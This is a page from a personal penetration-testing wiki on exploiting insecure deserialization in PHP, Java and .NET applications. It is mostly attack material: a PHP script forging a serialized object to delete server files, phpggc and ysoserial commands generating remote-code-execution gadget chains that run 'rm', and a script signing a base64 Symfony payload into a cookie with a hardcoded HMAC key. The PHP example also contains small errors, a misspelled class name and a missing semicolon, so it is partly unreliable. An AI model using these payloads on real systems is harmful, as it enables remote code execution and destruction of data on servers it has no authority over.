❎
wiki.hackerlab.cz
  • About me
  • Vulnerability Assessment
  • CLOUD PENTESTING
    • AWS
    • Microsoft Azure
  • REST API
  • Web Pentesting
    • LDAP Injection
    • Django ORM Exploitation
    • HTTP Request Smuggling
    • Server Side Template Injection (SSTI)
    • Insecure Deserialization
    • Brute force
    • Shell Fu - Oneliners
    • CORS
    • Special Chars & NULL Bytes
    • XSS
    • XXE
    • SQL Injection
    • Blind SQL Injection
    • SQLmap
    • NoSQL Injection
    • CRLF Injection
    • Input Validation - Fuzz1
    • HTTP Headers - X-Forwarded
    • Log4j
    • Enumeration with Wordlists
    • Bug Bounty - Web Recon
    • HTTP Proxy Override
    • CSV Injection
    • Windows Forbidden File Names
    • Path Traversal
    • OS Command Injection
    • Open Redirect
    • JWT Token
    • Burp Extensions - TokenJAR & ATOR
    • Upload RCE
    • GUID and UUIDs
  • Toolset
    • Git - Repo and Tools
    • Docker for Pentesters
  • Infrastructure Pentesting
    • Active Directory (AD)
      • Vulnerable Machines (labs)
      • Pass the hash
      • Azure Active Directory
      • Password Cracking
      • Domain Enumeration
      • LLMNR Poisoning with Responder
      • HTB Forest
      • LDAP
      • WinRM
      • SMB & RPC Enumeration
      • SMB Relay
      • Impacket
      • Bloodhound
      • OWA Exchange Server 2019
      • Active Directory Web Services (ADWS)
      • Active Directory Attacks
    • Mail Server Attacks
    • NFS Enumeration
    • Windows PostExploitation
      • Windows Enumeration
      • Powershell Payloads
      • Add RDP Account & Ride on Meterpreter
    • Dump File Analysis
  • Other Pentest Projects
    • Security Projects
  • WIFI Pentesting
    • Kali Linux - Alpha card AWUS 1900 (VirtualBox)
    • Active Card & Monitor Mode
    • Aircrack-ng Suite
  • Certs
    • Burp Suite Certified Practitioner
  • Linux
    • Network Manager
  • Books
    • The Hacker Playbook 3
Powered by GitBook
On this page
  • PHP
  • Manual serialization
  • PHPGCC
  • SHA1-HMAC - PHP signed gadget chain
  • Java
  • .NET

Was this helpful?

  1. Web Pentesting

Insecure Deserialization

Manual and gadget chain manipulation

PHP

Manual serialization

Manual serialization with class internal members override (access to an app source code) in order to achieve specific functionality.

<?php
// app class definition deletes a template file in the class destructor()
// initiate the object through cookie "session" 

class CustomTemplate {
    // make sure the access attribute is "public"
    public $template_file_path;
}    

$c = new CustomTeplate();
$c->template_file_path="/path/file-to-delete.txt"

// final serialized PHP object
echo serialize($c);

/* output
O:14:"CustomTemplate":1:{s:14:"lock_file_path";s:24:"/path/file-to-delete.txt";}
*/
?>

PHPGCC

automatic gadget chain when no source code review is possible

git clone https://github.com/ambionics/phpggc.git
phpggc symfony/rce4 exec 'rm /path/file-to-delete.txt' | base64 -w 0

SHA1-HMAC - PHP signed gadget chain

<?php

$phpgcc_object = "Tzo0NzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxUYWdBd2FyZUFkYXB0ZXIiOjI6e3M6NTc6IgBTeW1mb255XENvbXBvbmVudFxDYWNoZVxBZGFwdGVyXFRhZ0F3YXJlQWRhcHRlcgBkZWZlcnJlZCI7YToxOntpOjA7TzozMzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQ2FjaGVJdGVtIjoyOntzOjExOiIAKgBwb29sSGFzaCI7aToxO3M6MTI6IgAqAGlubmVySXRlbSI7czoyNjoicm0gL2hvbWUvY2FybG9zL21vcmFsZS50eHQiO319czo1MzoiAFN5bWZvbnlcQ29tcG9uZW50XENhY2hlXEFkYXB0ZXJcVGFnQXdhcmVBZGFwdGVyAHBvb2wiO086NDQ6IlN5bWZvbnlcQ29tcG9uZW50XENhY2hlXEFkYXB0ZXJcUHJveHlBZGFwdGVyIjoyOntzOjU0OiIAU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxQcm94eUFkYXB0ZXIAcG9vbEhhc2giO2k6MTtzOjU4OiIAU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxQcm94eUFkYXB0ZXIAc2V0SW5uZXJJdGVtIjtzOjQ6ImV4ZWMiO319Cg==";
$secretKey = "mx557o5crourg7j9hrmve29bdb60dfsn";

$cookie = urlencode('{"token":"' . $phpgcc_object . '","sig_hmac_sha1":"' . hash_hmac('sha1', $phpgcc_object, $secretKey) . '"}');
echo $cookie;
?>

Java

// there is no jar!
git clone https://github.com/frohoff/ysoserial.git
// jar download
wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
java -jar ysoserial.jar CommonsCollections4 calc.exe
java -jar ./ysoserial-master-SNAPSHOT.jar CommonsCollections4 'rm /path/file-to-delete.txt\'|base64 -w0

.NET

git clone https://github.com/pwntester/ysoserial.net.git
PreviousServer Side Template Injection (SSTI)NextBrute force

Last updated 1 year ago

Was this helpful?

LogoGitHub - pwntester/ysoserial.net: Deserialization payload generator for a variety of .NET formattersGitHub
LogoGitHub - frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.GitHub
LogoGitHub - ambionics/phpggc: PHPGGC is a library of PHP unserialize() payloads along with a tool to generate them, from command line or programmatically.GitHub